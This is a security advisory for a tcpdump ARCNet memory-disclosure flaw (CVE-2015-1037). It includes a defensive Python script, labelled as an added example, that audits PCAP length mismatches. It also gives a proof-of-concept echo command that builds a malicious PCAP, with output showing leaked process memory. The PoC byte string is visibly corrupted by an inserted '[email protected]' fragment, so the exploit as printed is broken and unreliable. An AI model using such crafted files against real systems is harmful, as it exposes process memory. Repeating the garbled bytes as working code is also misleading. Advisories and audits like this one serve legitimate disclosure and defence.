Sense of Security – Security Advisory – SOS-15-001
Release Date. | 21-Jan-2015 |
Last Update. | – |
Vendor Notification Date. | 05-Jan-2015 |
Product. | tcpdump |
Platform. | Windows / *nix / Mac OSX |
Affected versions. | 4.1 – 4.6.2 |
Severity Rating. | Medium |
Impact. | Memory disclosure |
Attack Vector. | Local |
Solution Status. | Vendor Update |
CVE reference. | CVE-2015-1037 |
Details.
tcpdump is a common command-line packet analyser. It allows the user to display TCP/IP and other packets being transmitted or received over a network to which the computer is attached. When dissecting an ARCNet packet, tcpdump uses the length announced in the ARCNet header of the PCAP record to read and display the packet content mapped in memory, by calling the function hex_and_ascii_print_with_offset(). If the captured length is less than the length announced in the packet (which can be forged), the call to the arcnet_if_print() function dumps process memory beyond the captured data, and tcpdump eventually crashes with a segmentation fault if the read pointer reaches an invalid address.
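The mismatch described above can be checked before a capture is handed to a dissector. The following Python script is an added example, not part of the advisory or of tcpdump: it parses a little-endian PCAP and, for ARCNET_LINUX records, computes how much payload the on-wire length announces versus how much was actually captured, which is the bound a safe printer must clamp to. The sample PCAP is constructed inline to mirror the PoC layout (link type 129, 16 captured bytes, 0x1008 announced bytes, ARCnet type 0xd5); the 5-byte/8-byte ARCnet Linux header lengths are assumed to match tcpdump's dissector.

```python
import struct

LINKTYPE_ARCNET_LINUX = 129
# ARCnet Linux header: 5 bytes for old-style IP/ARP/diagnosis types, 8 bytes otherwise
# (assumed here to match tcpdump's print-arcnet.c)
ARC_LINUX_HDRLEN, ARC_LINUX_HDRNEWLEN = 5, 8
OLD_STYLE_TYPES = {0xf0, 0xf1, 0x80}

def parse_pcap(data):
    """Return (linktype, [(incl_len, orig_len, packet_bytes), ...]) for a little-endian pcap."""
    magic, = struct.unpack_from("<I", data, 0)
    if magic != 0xa1b2c3d4:
        raise ValueError("unsupported or non-little-endian pcap magic")
    linktype, = struct.unpack_from("<I", data, 20)
    off, records = 24, []
    while off + 16 <= len(data):
        _, _, incl_len, orig_len = struct.unpack_from("<IIII", data, off)
        pkt = data[off + 16:off + 16 + incl_len]
        if len(pkt) < incl_len:  # file ends before the record's announced capture length
            break
        records.append((incl_len, orig_len, pkt))
        off += 16 + incl_len
    return linktype, records

def arcnet_linux_payload_bounds(incl_len, orig_len, pkt):
    """(announced, displayable): payload length per the wire length vs. per the captured
    length. A printer that walks 'announced' bytes reads past the captured record."""
    if incl_len < ARC_LINUX_HDRLEN:
        return 0, 0
    hdrlen = ARC_LINUX_HDRLEN if pkt[4] in OLD_STYLE_TYPES else ARC_LINUX_HDRNEWLEN
    if incl_len < hdrlen:
        return 0, 0
    announced = max(orig_len - hdrlen, 0)
    return announced, min(announced, incl_len - hdrlen)

def audit(data):
    """List (record index, bytes announced beyond the capture) for ARCNET_LINUX records."""
    linktype, records = parse_pcap(data)
    bounds = [arcnet_linux_payload_bounds(*r) for r in records] if linktype == LINKTYPE_ARCNET_LINUX else []
    return [(i, a - d) for i, (a, d) in enumerate(bounds) if a > d]

# Constructed sample mirroring the PoC layout: link type 129, one record with incl_len 16
# and orig_len 0x1008, ARCnet type 0xd5 (ARP) so the 8-byte header applies.
SAMPLE = (struct.pack("<IHHiIII", 0xa1b2c3d4, 2, 4, 0, 0, 0xffff, LINKTYPE_ARCNET_LINUX)
          + struct.pack("<IIII", 0x54b360ce, 255, 16, 0x1008)
          + bytes([0, 0, 0, 0, 0xd5, 0, 0, 0]) + b"A" * 8)
```

audit(SAMPLE) returns [(0, 4088)]: the record announces 4096 payload bytes but only 8 were captured, the gap that the vulnerable printer read from process memory.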
Proof of Concept.
The following lines generate a Proof-of-Concept PCAP file called 'dump.pcap'. When this PCAP file is read with tcpdump, tcpdump dumps 0x1000 bytes of the process memory.
$ echo '\xd4\xc3\xb2\xa1\x02\[email protected]\x00\x00\x16\x00\xed\x00\x00\x00\x00 \x00\x00\x00\x81\x00\x00\x00\xce`\xb3T\xff\x00\x00\x00\x10\x00\x00\x00
\x08\x10\x00\x00\x00\x00\x00\x00\xd5\x00\x00\x00AAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAA' > dump.pcap
$ tcpdump --version
tcpdump version 4.6.2
libpcap version 1.6.2
OpenSSL 1.0.1j 15 Oct 2014
$ tcpdump -r dump.pcap
reading from file dump.pcap, link-type ARCNET_LINUX (Linux ARCNET)
17:18:53.000255 [|ARP]
0x0000: 4141 4141 4141 4141 ffff ffff ffff ffff AAAAAAAA........
0x0010: 0000 0000 0000 0000 20b1 9d01 0000 0000 ................
[snip]
0x0c80: 4100 0000 0000 0000 2f6c 6962 2f78 3836 A......./lib/x86
0x0c90: 5f36 342d 6c69 6e75 782d 676e 7500 6c69 _64-linux-gnu.li
0x0ca0: 626e 7373 5f66 696c 6573 2e73 6f2e 3200 bnss_files.so.2.
0x0cb0: 2e73 6f2e 3200 0000 4000 0000 0000 0000 .so.2...@.......
0x0cc0: 3100 0000 0000 0000 b0bd 9d01 0000 0000 1...............
[snip]
Solution.
Update to tcpdump version 4.6.3.
Discovered by.
Christophe Alladoum from Sense of Security Labs.